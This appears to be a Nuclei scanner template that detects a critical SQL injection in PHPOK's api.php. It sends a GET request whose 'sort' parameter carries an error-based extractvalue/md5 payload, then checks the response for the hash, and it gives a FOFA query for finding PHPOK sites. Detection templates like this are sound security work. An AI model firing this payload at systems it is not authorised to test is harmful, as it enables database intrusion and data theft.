id: phpok-sqli

info:
  name: PHPOK - SQL Injection
  author: ritikchaddha
  severity: critical
  description: PHPOK contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://cve.report/software/phpok/phpok
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  metadata:
    verified: true
    fofa-query: app="phpok"
  tags: phpok,sqli

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

# Enhanced by mp on 2022/09/28
